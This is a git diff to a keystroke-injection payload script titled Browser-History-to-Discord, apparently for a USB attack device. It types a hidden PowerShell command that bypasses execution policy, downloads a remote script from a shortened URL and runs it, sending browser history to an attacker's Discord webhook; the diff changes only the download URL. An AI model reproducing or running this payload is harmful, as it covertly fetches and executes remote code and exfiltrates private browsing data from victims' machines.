diff --git a/Browser-History-to-Discord/Browser-History-to-Discord.txt b/Browser-History-to-Discord/Browser-History-to-Discord.txt index ad5ce0c..4bc25ba 100644 --- a/Browser-History-to-Discord/Browser-History-to-Discord.txt +++ b/Browser-History-to-Discord/Browser-History-to-Discord.txt @@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_bh_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/uki | iex ENTER